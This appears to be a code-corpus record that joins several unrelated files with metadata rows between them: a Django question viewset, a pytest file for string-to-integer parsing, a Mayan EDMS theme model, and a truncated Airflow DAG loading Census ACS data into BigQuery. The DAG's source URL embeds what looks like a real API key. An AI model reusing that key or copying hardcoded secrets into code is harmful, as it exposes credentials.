from apps.questions.serializers import BulkCreateQuestionsSerializer, QuestionReadSerializer, QuestionSerializer
class QuestionViewSet(
MultiSerializerMixin, mixins.CreateModelMixin, mixins.RetrieveModelMixin, mixins.ListModelMixin, GenericViewSet
):
"""
ViewSet based on Question model.
list: List every Question.
### This route allow to:
- Filter by field: *'categories', 'difficulty'*
- Order by field: *'id', 'created_at', 'updated_at'*
- Search fraze used in fields: *'question'*
retrieve: Retrieve specific instance of question.
To correct response you need provide *id* of existing question instance in path.
create: Create new question.
To successfuly add new question check QuestionSerializer.
"""
queryset = Question.objects.filter(is_public=True)
filter_backends = (DjangoFilterBackend, OrderingFilter, SearchFilter)
filter_fields = ["framework", "team", "language", "difficulty"]
ordering_fields = ["id", "created_at", "updated_at"]
search_fields = ["question"]
serializers = {
"bulk_create": BulkCreateQuestionsSerializer,
"create": QuestionSerializer,
"default": QuestionReadSerializer,
}
@action(detail=False, methods=["post"])
def bulk_create(self, request: Request) -> Response:
"""
Create many questions in on request.
:param request: request object
:return: List of created questions
"""
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
self.perform_create(serializer)
headers = self.get_success_headers(serializer.data)
return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)
@action(detail=False, methods=["get"])
def random_list(self, request: Request) -> Response:
"""
Return random list of questions.
:param request: request object
:return: List of random questions
"""
queryset = self.filter_queryset(self.get_queryset())
limit = int(request.query_params.get("limit", 5))
count = queryset.count()
if count > limit:
queryset = queryset.order_by("?")[:limit]
serializer = self.get_serializer(queryset, many=True)
return Response(serializer.data)
| 36.38961
| 115
| 0.712348
|
4a0eb17619396e3ecb35b16796d8b3fe736eadb7
| 362
|
py
|
Python
|
strings/tests/test_string_to_integer_ii.py
|
ahcode0919/python-ds-algorithms
|
0d617b78c50b6c18da40d9fa101438749bfc82e1
|
[
"MIT"
] | null | null | null |
strings/tests/test_string_to_integer_ii.py
|
ahcode0919/python-ds-algorithms
|
0d617b78c50b6c18da40d9fa101438749bfc82e1
|
[
"MIT"
] | null | null | null |
strings/tests/test_string_to_integer_ii.py
|
ahcode0919/python-ds-algorithms
|
0d617b78c50b6c18da40d9fa101438749bfc82e1
|
[
"MIT"
] | 3
|
2020-10-07T20:24:45.000Z
|
2020-12-16T04:53:19.000Z
|
from strings.string_to_integer_ii import string_to_integer_ii
def test_string_to_integer_ii():
assert string_to_integer_ii("34") == 34
assert string_to_integer_ii("100") == 100
assert string_to_integer_ii("-12") == -12
assert string_to_integer_ii("6") == 6
assert string_to_integer_ii("0") == 0
assert string_to_integer_ii("+34") == 34
| 32.909091
| 61
| 0.726519
|
4a0eb177915819a04f65f5e3e8d84984c6379c9d
| 11,204
|
py
|
Python
|
mayan/apps/appearance/models.py
|
ercusz/Mayan-EDMS
|
46accc39f3f252c43b8d9d2b19478ae7f13bd11d
|
[
"Apache-2.0"
] | null | null | null |
mayan/apps/appearance/models.py
|
ercusz/Mayan-EDMS
|
46accc39f3f252c43b8d9d2b19478ae7f13bd11d
|
[
"Apache-2.0"
] | null | null | null |
mayan/apps/appearance/models.py
|
ercusz/Mayan-EDMS
|
46accc39f3f252c43b8d9d2b19478ae7f13bd11d
|
[
"Apache-2.0"
] | null | null | null |
import bleach
import logging
from django.conf import settings
from django.db import models
from django.urls import reverse
from django.utils.encoding import force_text
from django.utils.translation import ugettext_lazy as _
from mayan.apps.converter.models import Asset
from mayan.apps.databases.model_mixins import ExtraDataModelMixin
from mayan.apps.events.classes import EventManagerSave
from mayan.apps.events.decorators import method_event
from django.dispatch import receiver
from django.db.models.signals import post_save
from mayan.apps.acls.models import AccessControlList
from mayan.apps.permissions.models import Role, StoredPermission
from django.contrib.contenttypes.models import ContentType
from django.core.validators import MaxValueValidator, MinValueValidator
from .events import event_theme_created, event_theme_edited
logger = logging.getLogger(name=__name__)
class Theme(ExtraDataModelMixin, models.Model):
label = models.CharField(
db_index=True, help_text=_('A short text describing the theme.'),
max_length=128, unique=True, verbose_name=_('Label')
)
stylesheet = models.TextField(
blank=True, help_text=_(
'The CSS stylesheet to change the appearance of the different '
'user interface elements.'
), verbose_name=_('Stylesheet (Advanced)')
)
default = models.BooleanField(
default=False,
help_text=_(
'Set this theme to default theme.'
), verbose_name=_('Default Theme')
)
header_text_brand = models.CharField(
max_length=26, blank=True,
help_text=_('The heading text on header components.'),
verbose_name=_('Heading Text')
)
header_text_brand_size = models.PositiveIntegerField(
default=19, validators=[MinValueValidator(12), MaxValueValidator(36)],
help_text=_('The font size of heading text on header components. \n only support size 12-36px'),
verbose_name=_('Heading Text Font Size')
)
logo_asset = models.OneToOneField(
on_delete=models.CASCADE, to=Asset, verbose_name=_('Logo file'),
blank=True, null=True, related_name='logo_asset'
)
font_asset = models.OneToOneField(
on_delete=models.CASCADE, to=Asset, verbose_name=_('Font file'),
blank=True, null=True, related_name='font_asset'
)
font_header_asset = models.OneToOneField(
on_delete=models.CASCADE, to=Asset, verbose_name=_('Header font file'),
blank=True, null=True, related_name='font_header_asset'
)
header_bg = models.CharField(
max_length=7, blank=True, default='#ffffff',
help_text=_('The background color on header components.'),
verbose_name=_('[Header] Background Color')
)
header_text = models.CharField(
max_length=7, blank=True, default='#0F75BD',
help_text=_('The text color on header components.'),
verbose_name=_('[Header] Text Color')
)
body_bg = models.CharField(
max_length=7, blank=True, default='#ffffff',
help_text=_('The background color on page body.'),
verbose_name=_('[Body] Background Color')
)
body_text = models.CharField(
max_length=7, blank=True, default='#0a5286',
help_text=_('The text color on page body.'),
verbose_name=_('[Body] Text Color')
)
body_link_hover = models.CharField(
max_length=7, blank=True, default='#0a5286',
help_text=_('(Hover action)The link color on page body.'),
verbose_name=_('[Body] Link Text Color (Hover action)')
)
body_block = models.CharField(
max_length=7, blank=True, default='#ECF0F1',
help_text=_('The block color on page body.'),
verbose_name=_('[Body] Block Background Color')
)
body_primary_btn = models.CharField(
max_length=7, blank=True, default='#0F75BD',
help_text=_('The background color of primary button on page body.'),
verbose_name=_('[Body] Primary Button Background Color')
)
lpanel_bg = models.CharField(
max_length=7, blank=True, default='#ffffff',
help_text=_('The background color on left panel components.'),
verbose_name=_('[Left Panel] Background Color')
)
lpanel_collapse_btn_bg = models.CharField(
max_length=7, blank=True, default='#ffffff',
help_text=_('The background color of collapse button on left panel.'),
verbose_name=_('[Left Panel] Collapse Button Background Color')
)
lpanel_collapse_btn_text = models.CharField(
max_length=7, blank=True, default='#0F75BD',
help_text=_('The text color of collapse button on left panel.'),
verbose_name=_('[Left Panel] Collapse Button Text Color')
)
lpanel_collapse_btn_bg_hover = models.CharField(
max_length=7, blank=True, default='#0F75BD',
help_text=_('(Hover action)The background color of collapse button on left panel.'),
verbose_name=_('[Left Panel] Collapse Button Background Color(Hover action)')
)
lpanel_collapse_btn_text_hover = models.CharField(
max_length=7, blank=True, default='#ffffff',
help_text=_('(Hover action)The text color of collapse button on left panel.'),
verbose_name=_('[Left Panel] Collapse Button Text Color(Hover action)')
)
lpanel_collapsed_panel_bg = models.CharField(
max_length=7, blank=True, default='#ffffff',
help_text=_('(Active action)The background color of collapsed panel on left panel.'),
verbose_name=_('[Left Panel] Collapsed Panel Background Color(Active action)')
)
lpanel_collapsed_btn_text = models.CharField(
max_length=7, blank=True, default='#ffffff',
help_text=_('(Active action)The text color of collapsed button on left panel.'),
verbose_name=_('[Left Panel] Collapsed Button Text Color(Active action)')
)
lpanel_collapsed_btn_bg_hover = models.CharField(
max_length=7, blank=True, default='#0F75BD',
help_text=_('(Active+Hover action)The background color of collapsed button on left panel.'),
verbose_name=_('[Left Panel] Collapsed Button Background Color(Active+Hover action)')
)
rnav_bg_hover = models.CharField(
max_length=7, blank=True, default='#0F75BD',
help_text=_('(Hover action)The background color of button on right navbar.'),
verbose_name=_('[Right Navbar] Button Background Color(Hover action)')
)
rnav_text_hover = models.CharField(
max_length=7, blank=True, default='#0F75BD',
help_text=_('(Hover action)The text color of button on right navbar.'),
verbose_name=_('[Right Navbar] Button Text Color(Hover action)')
)
rnav_panelex_bg = models.CharField(
max_length=7, blank=True, default='#ffffff',
help_text=_('(Expanded Action)The background color of panel on right navbar menu list.'),
verbose_name=_('[Right Navbar] Expanded Panel Background Color(Expanded action)')
)
rnav_panelex_text = models.CharField(
max_length=7, blank=True, default='#0F75BD',
help_text=_('(Expanded Action)The text color of panel on right navbar menu list.'),
verbose_name=_('[Right Navbar] Expanded Panel Text Color(Expanded action)')
)
rnav_ex_bg_hover = models.CharField(
max_length=7, blank=True, default='#0F75BD',
help_text=_('(Expanded+Hover Action)The background color of panel on right navbar menu list when hover.'),
verbose_name=_('[Right Navbar] Expanded Panel Background Color(Expanded+Hover action)')
)
rnav_ex_text_hover = models.CharField(
max_length=7, blank=True, default='#ffffff',
help_text=_('(Expanded+Hover Action)The text color of panel on right navbar menu list when hover.'),
verbose_name=_('[Right Navbar] Expanded Panel Text Color(Expanded+Hover action)')
)
class Meta:
ordering = ('label',)
verbose_name = _('Theme')
verbose_name_plural = _('Themes')
def __str__(self):
return force_text(s=self.label)
def get_absolute_url(self):
return reverse(
viewname='appearance:theme_edit', kwargs={
'theme_id': self.pk
}
)
@method_event(
event_manager_class=EventManagerSave,
created={
'event': event_theme_created,
'target': 'self',
},
edited={
'event': event_theme_edited,
'target': 'self',
}
)
def save(self, *args, **kwargs):
self.stylesheet = bleach.clean(
text=self.stylesheet, tags=('style',)
)
if self.default:
Theme.objects.all().update(default=False)
super().save(*args, **kwargs)
def delete(self, *args, **kwargs):
try:
Asset.objects.get(label=self.label+'_logo').delete()
Asset.objects.get(label=self.label+'_font').delete()
Asset.objects.get(label=self.label+'_header_font').delete()
except:
logger.debug(
'Asset logo and font label="%s" not found', self.label
)
return super().delete(*args, **kwargs)
@receiver(post_save, sender=Theme)
def set_asset_permissions(sender, instance, created, **kwargs):
try:
logo_acl = AccessControlList.objects.create(
content_type=ContentType.objects
.get(app_label='converter', model='asset'),
content_object=Asset.objects.get(label=instance.label+'_logo'),
role=Role.objects.get(label='Users')
)
font_acl = AccessControlList.objects.create(
content_type=ContentType.objects
.get(app_label='converter', model='asset'),
content_object=Asset.objects.get(label=instance.label+'_font'),
role=Role.objects.get(label='Users')
)
font_header_acl = AccessControlList.objects.create(
content_type=ContentType.objects
.get(app_label='converter', model='asset'),
content_object=Asset.objects.get(label=instance.label+'_header_font'),
role=Role.objects.get(label='Users')
)
stored_permission = StoredPermission.objects.get(
namespace='converter',
name='asset_view',
)
logo_acl.permissions.add(stored_permission)
font_acl.permissions.add(stored_permission)
font_header_acl.permissions.add(stored_permission)
except:
logger.debug(
'ACLs for assets in theme="%s" was created', instance.label
)
class UserThemeSetting(models.Model):
user = models.OneToOneField(
on_delete=models.CASCADE, related_name='theme_settings',
to=settings.AUTH_USER_MODEL, verbose_name=_('User')
)
theme = models.ForeignKey(
blank=True, null=True, on_delete=models.CASCADE,
related_name='user_setting', to=Theme, verbose_name=_('Theme')
)
class Meta:
verbose_name = _('User theme setting')
verbose_name_plural = _('User theme settings')
def __str__(self):
return force_text(s=self.user)
| 41.962547
| 114
| 0.661549
|
4a0eb27033f6b9c491bccd17821f9215e6e87539
| 32,771
|
py
|
Python
|
datasets/census_bureau_acs/pipelines/place_2019_5yr/place_2019_5yr_dag.py
|
gkodukula/public-datasets-pipelines
|
4f4c87edae252059062ba479b80559e7675a885f
|
[
"Apache-2.0"
] | null | null | null |
datasets/census_bureau_acs/pipelines/place_2019_5yr/place_2019_5yr_dag.py
|
gkodukula/public-datasets-pipelines
|
4f4c87edae252059062ba479b80559e7675a885f
|
[
"Apache-2.0"
] | null | null | null |
datasets/census_bureau_acs/pipelines/place_2019_5yr/place_2019_5yr_dag.py
|
gkodukula/public-datasets-pipelines
|
4f4c87edae252059062ba479b80559e7675a885f
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from airflow import DAG
from airflow.providers.cncf.kubernetes.operators import kubernetes_pod
from airflow.providers.google.cloud.transfers import gcs_to_bigquery
default_args = {
"owner": "Google",
"depends_on_past": False,
"start_date": "2021-03-01",
}
with DAG(
dag_id="census_bureau_acs.place_2019_5yr",
default_args=default_args,
max_active_runs=1,
schedule_interval="@once",
catchup=False,
default_view="graph",
) as dag:
# Run CSV transform within kubernetes pod
place_2019_5yr_transform_csv = kubernetes_pod.KubernetesPodOperator(
task_id="place_2019_5yr_transform_csv",
startup_timeout_seconds=600,
name="place_2019_5yr",
namespace="composer",
service_account_name="datasets",
image_pull_policy="Always",
image="{{ var.json.census_bureau_acs.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "https://api.census.gov/data/2019/acs/acs~year_report~?get=NAME,~group_id~_~row_position~E&for=~api_naming_convention~:*&key=550e53635053be51754b09b5e9f5009c94aa0586",
"YEAR_REPORT": "5",
"API_NAMING_CONVENTION": "place",
"TARGET_FILE": "files/data_output.csv",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "data/census_bureau_acs/place_2019_5yr/data_output.csv",
"PIPELINE_NAME": "place_2019_5yr",
"GEOGRAPHY": "place",
"REPORT_LEVEL": "national_level",
"CONCAT_COL": '["state","place"]',
"RENAME_MAPPINGS": '{"0":"name", "1":"KPI_Value", "2":"state", "3":"place"}',
"CSV_HEADERS": '["geo_id","aggregate_travel_time_to_work","amerindian_including_hispanic","amerindian_pop","armed_forces","asian_including_hispanic","asian_male_45_54","asian_male_55_64","asian_pop","associates_degree","bachelors_degree","bachelors_degree_2","bachelors_degree_or_higher_25_64","black_including_hispanic","black_male_45_54","black_male_55_64","black_pop","children","children_in_single_female_hh","civilian_labor_force","commute_10_14_mins","commute_15_19_mins","commute_20_24_mins","commute_25_29_mins","commute_30_34_mins","commute_35_39_mins","commute_35_44_mins","commute_40_44_mins","commute_45_59_mins","commute_5_9_mins","commute_60_89_mins","commute_60_more_mins","commute_90_more_mins","commute_less_10_mins","commuters_16_over","commuters_by_bus","commuters_by_car_truck_van","commuters_by_carpool","commuters_by_public_transportation","commuters_by_subway_or_elevated","commuters_drove_alone","different_house_year_ago_different_city","different_house_year_ago_same_city","dwellings_10_to_19_units","dwellings_1_units_attached","dwellings_1_units_detached","dwellings_20_to_49_units","dwellings_2_units","dwellings_3_to_4_units","dwellings_50_or_more_units","dwellings_5_to_9_units","employed_agriculture_forestry_fishing_hunting_mining","employed_arts_entertainment_recreation_accommodation_food","employed_construction","employed_education_health_social","employed_finance_insurance_real_estate","employed_information","employed_manufacturing","employed_other_services_not_public_admin","employed_pop","employed_public_administration","employed_retail_trade","employed_science_management_admin_waste","employed_transportation_warehousing_utilities","employed_wholesale_trade","families_with_young_children","family_households","father_in_labor_force_one_parent_families_with_young_children","father_one_parent_families_with_young_children","female_10_to_14","female_15_to_17","female_18_to_19","female_20","female_21","female_22_to_24","female_25_to_29","female_30_to_34","female_35_to_39","female_40_to_44","female_45_to_49","female_50_to_54","female_55_to_59","female_5_to_9","female_60_to_61","female_62_to_64","female_65_to_66","female_67_to_69","female_70_to_74","female_75_to_79","female_80_to_84","female_85_and_over","female_female_households","female_pop","female_under_5","four_more_cars","gini_index","graduate_professional_degree","group_quarters","high_school_diploma","high_school_including_ged","hispanic_any_race","hispanic_male_45_54","hispanic_male_55_64","hispanic_pop","households","households_public_asst_or_food_stamps","households_retirement_income","housing_built_1939_or_earlier","housing_built_2000_to_2004","housing_built_2005_or_later","housing_units","housing_units_renter_occupied","in_grades_1_to_4","in_grades_5_to_8","in_grades_9_to_12","in_school","in_undergrad_college","income_100000_124999","income_10000_14999","income_125000_149999","income_150000_199999","income_15000_19999","income_200000_or_more","income_20000_24999","income_25000_29999","income_30000_34999","income_35000_39999","income_40000_44999","income_45000_49999","income_50000_59999","income_60000_74999","income_75000_99999","income_less_10000","income_per_capita","less_one_year_college","less_than_high_school_graduate","male_10_to_14","male_15_to_17","male_18_to_19","male_20","male_21","male_22_to_24","male_25_to_29","male_30_to_34","male_35_to_39","male_40_to_44","male_45_64_associates_degree","male_45_64_bachelors_degree","male_45_64_grade_9_12","male_45_64_graduate_degree","male_45_64_high_school","male_45_64_less_than_9_grade","male_45_64_some_college","male_45_to_49","male_45_to_64","male_50_to_54","male_55_to_59","male_5_to_9","male_60_to_61","male_62_to_64","male_65_to_66","male_67_to_69","male_70_to_74","male_75_to_79","male_80_to_84","male_85_and_over","male_male_households","male_pop","male_under_5","management_business_sci_arts_employed","married_households","masters_degree","median_age","median_income","median_rent","median_year_structure_built","million_dollar_housing_units","mobile_homes","mortgaged_housing_units","no_car","no_cars","nonfamily_households","not_hispanic_pop","not_in_labor_force","not_us_citizen_pop","occupation_management_arts","occupation_natural_resources_construction_maintenance","occupation_production_transportation_material","occupation_sales_office","occupation_services","occupied_housing_units","one_car","one_parent_families_with_young_children","one_year_more_college","other_race_pop","owner_occupied_housing_units","owner_occupied_housing_units_lower_value_quartile","owner_occupied_housing_units_median_value","owner_occupied_housing_units_upper_value_quartile","percent_income_spent_on_rent","pop_16_over","pop_25_64","pop_25_years_over","pop_5_years_over","pop_determined_poverty_status","pop_in_labor_force","population_1_year_and_over","population_3_years_over","poverty","rent_10_to_15_percent","rent_15_to_20_percent","rent_20_to_25_percent","rent_25_to_30_percent","rent_30_to_35_percent","rent_35_to_40_percent","rent_40_to_50_percent","rent_burden_not_computed","rent_over_50_percent","rent_under_10_percent","renter_occupied_housing_units_paying_cash_median_gross_rent","sales_office_employed","some_college_and_associates_degree","speak_only_english_at_home","speak_spanish_at_home","speak_spanish_at_home_low_english","three_cars","total_pop","two_cars","two_or_more_races_pop","two_parent_families_with_young_children","two_parents_father_in_labor_force_families_with_young_children","two_parents_in_labor_force_families_with_young_children","two_parents_mother_in_labor_force_families_with_young_children","two_parents_not_in_labor_force_families_with_young_children","unemployed_pop","vacant_housing_units","vacant_housing_units_for_rent","vacant_housing_units_for_sale","walked_to_work","white_including_hispanic","white_male_45_54","white_male_55_64","white_pop","worked_at_home","workers_16_and_over"]',
},
resources={
"request_memory": "4G",
"request_cpu": "2",
"request_ephemeral_storage": "10G",
},
)
# Task to load CSV data to a BigQuery table
load_place_2019_5yr_to_bq = gcs_to_bigquery.GCSToBigQueryOperator(
task_id="load_place_2019_5yr_to_bq",
bucket="{{ var.value.composer_bucket }}",
source_objects=["data/census_bureau_acs/place_2019_5yr/data_output.csv"],
source_format="CSV",
destination_project_dataset_table="census_bureau_acs.place_2019_5yr",
skip_leading_rows=1,
allow_quoted_newlines=True,
write_disposition="WRITE_TRUNCATE",
schema_fields=[
{"name": "geo_id", "type": "string", "mode": "nullable"},
{
"name": "aggregate_travel_time_to_work",
"type": "float",
"mode": "nullable",
},
{
"name": "amerindian_including_hispanic",
"type": "float",
"mode": "nullable",
},
{"name": "amerindian_pop", "type": "float", "mode": "nullable"},
{"name": "armed_forces", "type": "float", "mode": "nullable"},
{"name": "asian_including_hispanic", "type": "float", "mode": "nullable"},
{"name": "asian_male_45_54", "type": "float", "mode": "nullable"},
{"name": "asian_male_55_64", "type": "float", "mode": "nullable"},
{"name": "asian_pop", "type": "float", "mode": "nullable"},
{"name": "associates_degree", "type": "float", "mode": "nullable"},
{"name": "bachelors_degree", "type": "float", "mode": "nullable"},
{"name": "bachelors_degree_2", "type": "float", "mode": "nullable"},
{
"name": "bachelors_degree_or_higher_25_64",
"type": "float",
"mode": "nullable",
},
{"name": "black_including_hispanic", "type": "float", "mode": "nullable"},
{"name": "black_male_45_54", "type": "float", "mode": "nullable"},
{"name": "black_male_55_64", "type": "float", "mode": "nullable"},
{"name": "black_pop", "type": "float", "mode": "nullable"},
{"name": "children", "type": "float", "mode": "nullable"},
{
"name": "children_in_single_female_hh",
"type": "float",
"mode": "nullable",
},
{"name": "civilian_labor_force", "type": "float", "mode": "nullable"},
{"name": "commute_10_14_mins", "type": "float", "mode": "nullable"},
{"name": "commute_15_19_mins", "type": "float", "mode": "nullable"},
{"name": "commute_20_24_mins", "type": "float", "mode": "nullable"},
{"name": "commute_25_29_mins", "type": "float", "mode": "nullable"},
{"name": "commute_30_34_mins", "type": "float", "mode": "nullable"},
{"name": "commute_35_39_mins", "type": "float", "mode": "nullable"},
{"name": "commute_35_44_mins", "type": "float", "mode": "nullable"},
{"name": "commute_40_44_mins", "type": "float", "mode": "nullable"},
{"name": "commute_45_59_mins", "type": "float", "mode": "nullable"},
{"name": "commute_5_9_mins", "type": "float", "mode": "nullable"},
{"name": "commute_60_89_mins", "type": "float", "mode": "nullable"},
{"name": "commute_60_more_mins", "type": "float", "mode": "nullable"},
{"name": "commute_90_more_mins", "type": "float", "mode": "nullable"},
{"name": "commute_less_10_mins", "type": "float", "mode": "nullable"},
{"name": "commuters_16_over", "type": "float", "mode": "nullable"},
{"name": "commuters_by_bus", "type": "float", "mode": "nullable"},
{"name": "commuters_by_car_truck_van", "type": "float", "mode": "nullable"},
{"name": "commuters_by_carpool", "type": "float", "mode": "nullable"},
{
"name": "commuters_by_public_transportation",
"type": "float",
"mode": "nullable",
},
{
"name": "commuters_by_subway_or_elevated",
"type": "float",
"mode": "nullable",
},
{"name": "commuters_drove_alone", "type": "float", "mode": "nullable"},
{
"name": "different_house_year_ago_different_city",
"type": "float",
"mode": "nullable",
},
{
"name": "different_house_year_ago_same_city",
"type": "float",
"mode": "nullable",
},
{"name": "dwellings_10_to_19_units", "type": "float", "mode": "nullable"},
{"name": "dwellings_1_units_attached", "type": "float", "mode": "nullable"},
{"name": "dwellings_1_units_detached", "type": "float", "mode": "nullable"},
{"name": "dwellings_20_to_49_units", "type": "float", "mode": "nullable"},
{"name": "dwellings_2_units", "type": "float", "mode": "nullable"},
{"name": "dwellings_3_to_4_units", "type": "float", "mode": "nullable"},
{"name": "dwellings_50_or_more_units", "type": "float", "mode": "nullable"},
{"name": "dwellings_5_to_9_units", "type": "float", "mode": "nullable"},
{
"name": "employed_agriculture_forestry_fishing_hunting_mining",
"type": "float",
"mode": "nullable",
},
{
"name": "employed_arts_entertainment_recreation_accommodation_food",
"type": "float",
"mode": "nullable",
},
{"name": "employed_construction", "type": "float", "mode": "nullable"},
{
"name": "employed_education_health_social",
"type": "float",
"mode": "nullable",
},
{
"name": "employed_finance_insurance_real_estate",
"type": "float",
"mode": "nullable",
},
{"name": "employed_information", "type": "float", "mode": "nullable"},
{"name": "employed_manufacturing", "type": "float", "mode": "nullable"},
{
"name": "employed_other_services_not_public_admin",
"type": "float",
"mode": "nullable",
},
{"name": "employed_pop", "type": "float", "mode": "nullable"},
{
"name": "employed_public_administration",
"type": "float",
"mode": "nullable",
},
{"name": "employed_retail_trade", "type": "float", "mode": "nullable"},
{
"name": "employed_science_management_admin_waste",
"type": "float",
"mode": "nullable",
},
{
"name": "employed_transportation_warehousing_utilities",
"type": "float",
"mode": "nullable",
},
{"name": "employed_wholesale_trade", "type": "float", "mode": "nullable"},
{
"name": "families_with_young_children",
"type": "float",
"mode": "nullable",
},
{"name": "family_households", "type": "float", "mode": "nullable"},
{
"name": "father_in_labor_force_one_parent_families_with_young_children",
"type": "float",
"mode": "nullable",
},
{
"name": "father_one_parent_families_with_young_children",
"type": "float",
"mode": "nullable",
},
{"name": "female_10_to_14", "type": "float", "mode": "nullable"},
{"name": "female_15_to_17", "type": "float", "mode": "nullable"},
{"name": "female_18_to_19", "type": "float", "mode": "nullable"},
{"name": "female_20", "type": "float", "mode": "nullable"},
{"name": "female_21", "type": "float", "mode": "nullable"},
{"name": "female_22_to_24", "type": "float", "mode": "nullable"},
{"name": "female_25_to_29", "type": "float", "mode": "nullable"},
{"name": "female_30_to_34", "type": "float", "mode": "nullable"},
{"name": "female_35_to_39", "type": "float", "mode": "nullable"},
{"name": "female_40_to_44", "type": "float", "mode": "nullable"},
{"name": "female_45_to_49", "type": "float", "mode": "nullable"},
{"name": "female_50_to_54", "type": "float", "mode": "nullable"},
{"name": "female_55_to_59", "type": "float", "mode": "nullable"},
{"name": "female_5_to_9", "type": "float", "mode": "nullable"},
{"name": "female_60_to_61", "type": "float", "mode": "nullable"},
{"name": "female_62_to_64", "type": "float", "mode": "nullable"},
{"name": "female_65_to_66", "type": "float", "mode": "nullable"},
{"name": "female_67_to_69", "type": "float", "mode": "nullable"},
{"name": "female_70_to_74", "type": "float", "mode": "nullable"},
{"name": "female_75_to_79", "type": "float", "mode": "nullable"},
{"name": "female_80_to_84", "type": "float", "mode": "nullable"},
{"name": "female_85_and_over", "type": "float", "mode": "nullable"},
{"name": "female_female_households", "type": "float", "mode": "nullable"},
{"name": "female_pop", "type": "float", "mode": "nullable"},
{"name": "female_under_5", "type": "float", "mode": "nullable"},
{"name": "four_more_cars", "type": "float", "mode": "nullable"},
{"name": "gini_index", "type": "float", "mode": "nullable"},
{
"name": "graduate_professional_degree",
"type": "float",
"mode": "nullable",
},
{"name": "group_quarters", "type": "float", "mode": "nullable"},
{"name": "high_school_diploma", "type": "float", "mode": "nullable"},
{"name": "high_school_including_ged", "type": "float", "mode": "nullable"},
{"name": "hispanic_any_race", "type": "float", "mode": "nullable"},
{"name": "hispanic_male_45_54", "type": "float", "mode": "nullable"},
{"name": "hispanic_male_55_64", "type": "float", "mode": "nullable"},
{"name": "hispanic_pop", "type": "float", "mode": "nullable"},
{"name": "households", "type": "float", "mode": "nullable"},
{
"name": "households_public_asst_or_food_stamps",
"type": "float",
"mode": "nullable",
},
{
"name": "households_retirement_income",
"type": "float",
"mode": "nullable",
},
{
"name": "housing_built_1939_or_earlier",
"type": "float",
"mode": "nullable",
},
{"name": "housing_built_2000_to_2004", "type": "float", "mode": "nullable"},
{
"name": "housing_built_2005_or_later",
"type": "float",
"mode": "nullable",
},
{"name": "housing_units", "type": "float", "mode": "nullable"},
{
"name": "housing_units_renter_occupied",
"type": "float",
"mode": "nullable",
},
{"name": "in_grades_1_to_4", "type": "float", "mode": "nullable"},
{"name": "in_grades_5_to_8", "type": "float", "mode": "nullable"},
{"name": "in_grades_9_to_12", "type": "float", "mode": "nullable"},
{"name": "in_school", "type": "float", "mode": "nullable"},
{"name": "in_undergrad_college", "type": "float", "mode": "nullable"},
{"name": "income_100000_124999", "type": "float", "mode": "nullable"},
{"name": "income_10000_14999", "type": "float", "mode": "nullable"},
{"name": "income_125000_149999", "type": "float", "mode": "nullable"},
{"name": "income_150000_199999", "type": "float", "mode": "nullable"},
{"name": "income_15000_19999", "type": "float", "mode": "nullable"},
{"name": "income_200000_or_more", "type": "float", "mode": "nullable"},
{"name": "income_20000_24999", "type": "float", "mode": "nullable"},
{"name": "income_25000_29999", "type": "float", "mode": "nullable"},
{"name": "income_30000_34999", "type": "float", "mode": "nullable"},
{"name": "income_35000_39999", "type": "float", "mode": "nullable"},
{"name": "income_40000_44999", "type": "float", "mode": "nullable"},
{"name": "income_45000_49999", "type": "float", "mode": "nullable"},
{"name": "income_50000_59999", "type": "float", "mode": "nullable"},
{"name": "income_60000_74999", "type": "float", "mode": "nullable"},
{"name": "income_75000_99999", "type": "float", "mode": "nullable"},
{"name": "income_less_10000", "type": "float", "mode": "nullable"},
{"name": "income_per_capita", "type": "float", "mode": "nullable"},
{"name": "less_one_year_college", "type": "float", "mode": "nullable"},
{
"name": "less_than_high_school_graduate",
"type": "float",
"mode": "nullable",
},
{"name": "male_10_to_14", "type": "float", "mode": "nullable"},
{"name": "male_15_to_17", "type": "float", "mode": "nullable"},
{"name": "male_18_to_19", "type": "float", "mode": "nullable"},
{"name": "male_20", "type": "float", "mode": "nullable"},
{"name": "male_21", "type": "float", "mode": "nullable"},
{"name": "male_22_to_24", "type": "float", "mode": "nullable"},
{"name": "male_25_to_29", "type": "float", "mode": "nullable"},
{"name": "male_30_to_34", "type": "float", "mode": "nullable"},
{"name": "male_35_to_39", "type": "float", "mode": "nullable"},
{"name": "male_40_to_44", "type": "float", "mode": "nullable"},
{
"name": "male_45_64_associates_degree",
"type": "float",
"mode": "nullable",
},
{
"name": "male_45_64_bachelors_degree",
"type": "float",
"mode": "nullable",
},
{"name": "male_45_64_grade_9_12", "type": "float", "mode": "nullable"},
{"name": "male_45_64_graduate_degree", "type": "float", "mode": "nullable"},
{"name": "male_45_64_high_school", "type": "float", "mode": "nullable"},
{
"name": "male_45_64_less_than_9_grade",
"type": "float",
"mode": "nullable",
},
{"name": "male_45_64_some_college", "type": "float", "mode": "nullable"},
{"name": "male_45_to_49", "type": "float", "mode": "nullable"},
{"name": "male_45_to_64", "type": "float", "mode": "nullable"},
{"name": "male_50_to_54", "type": "float", "mode": "nullable"},
{"name": "male_55_to_59", "type": "float", "mode": "nullable"},
{"name": "male_5_to_9", "type": "float", "mode": "nullable"},
{"name": "male_60_to_61", "type": "float", "mode": "nullable"},
{"name": "male_62_to_64", "type": "float", "mode": "nullable"},
{"name": "male_65_to_66", "type": "float", "mode": "nullable"},
{"name": "male_67_to_69", "type": "float", "mode": "nullable"},
{"name": "male_70_to_74", "type": "float", "mode": "nullable"},
{"name": "male_75_to_79", "type": "float", "mode": "nullable"},
{"name": "male_80_to_84", "type": "float", "mode": "nullable"},
{"name": "male_85_and_over", "type": "float", "mode": "nullable"},
{"name": "male_male_households", "type": "float", "mode": "nullable"},
{"name": "male_pop", "type": "float", "mode": "nullable"},
{"name": "male_under_5", "type": "float", "mode": "nullable"},
{
"name": "management_business_sci_arts_employed",
"type": "float",
"mode": "nullable",
},
{"name": "married_households", "type": "float", "mode": "nullable"},
